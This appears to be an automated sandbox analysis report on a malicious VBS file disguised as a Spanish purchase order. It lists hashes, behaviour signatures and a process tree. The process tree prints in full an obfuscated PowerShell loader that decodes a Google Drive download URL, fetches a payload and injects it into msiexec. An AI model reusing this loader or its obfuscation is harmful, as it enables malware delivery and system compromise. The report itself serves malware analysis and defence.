Analysis
- max time kernel: 135s
- max time network: 127s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-10-2024 14:57
- Static task: static1
- Behavioral task: behavioral1
- Sample: Distribuciones Enelca Jaén, S.L. PEDIDO 456799.vbs
- Resource: win7-20240708-en
General
- Target: Distribuciones Enelca Jaén, S.L. PEDIDO 456799.vbs
- Size: 529KB
- MD5: 3f13eef87515d70fbdfedc6de7b6efc4
- SHA1: 8d2394c2e4daada6b8d9af1b60d8d11130ac1845
- SHA256: a2ef6e1f58a00b5d6523987df95a7ffc052a89470f97cd228a14fbccff113237
- SHA512: 585541e886e8175def7f0e4d92c2ad39c065f8777a113c8738a2aaade3dc96592572265f1e3511718dcdd0703730d530fa13b88c4773ecd2a2ef181c5886de7a
- SSDEEP: 6144:o0/75XG/Kk33JliXA0PsaaBBWiQP88BNkmxylnwa4j3Ms/+UrJ/WzukhWwP+m55k:BNU3/G6PQU8/xCnv4Y4lWzCwPHtvP9Dg
Malware Config
Signatures
Blocklisted process makes network request (7 IoCs)
Processes (flow, PID, process):
- flow 24, PID 5080, powershell.exe
- flow 27, PID 5080, powershell.exe
- flow 47, PID 1604, msiexec.exe
- flow 49, PID 1604, msiexec.exe
- flow 52, PID 1604, msiexec.exe
- flow 54, PID 1604, msiexec.exe
- flow 55, PID 1604, msiexec.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation (WScript.exe)
Command and Scripting Interpreter: PowerShell
Processes:
- PID 5080, powershell.exe
- PID 3780, powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes:
- PID 1604, msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes:
- PID 3780, powershell.exe
- PID 1604, msiexec.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
Processes:
- PID 856, WerFault.exe (target PID 1604, msiexec.exe)
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (msiexec.exe)
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
- PID 5080, powershell.exe
- PID 5080, powershell.exe
- PID 3780, powershell.exe
- PID 3780, powershell.exe
- PID 3780, powershell.exe
Suspicious behavior: MapViewOfSection (1 IoCs)
Processes:
- PID 3780, powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
- Token: SeDebugPrivilege, PID 5080, powershell.exe
- Token: SeDebugPrivilege, PID 3780, powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
Processes (PID wrote to memory of target PID, process → target process):
- PID 5052 wrote to memory of 5080 (WScript.exe → powershell.exe)
- PID 5052 wrote to memory of 5080 (WScript.exe → powershell.exe)
- PID 3780 wrote to memory of 1604 (powershell.exe → msiexec.exe)
- PID 3780 wrote to memory of 1604 (powershell.exe → msiexec.exe)
- PID 3780 wrote to memory of 1604 (powershell.exe → msiexec.exe)
- PID 3780 wrote to memory of 1604 (powershell.exe → msiexec.exe)
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Distribuciones Enelca Jaén, S.L. PEDIDO 456799.vbs" 1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5052
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. 
OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi 
ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') 
;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<same obfuscated script as the PID 5080 command line above>" 1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3780
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe" 2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 1832 3⤵
- Program crash
PID:856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1604 -ip 1604 1⤵
PID:228
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1KB
  MD5: 71444def27770d9071039d005d0323b7
  SHA1: cef8654e95495786ac9347494f4417819373427e
  SHA256: 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
  SHA512: a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 464KB
  MD5: d43327229caac3f1c1c7443675eaa345
  SHA1: 169d456a6122e6a39603f3017eb16df162aca251
  SHA256: 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3
  SHA512: da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d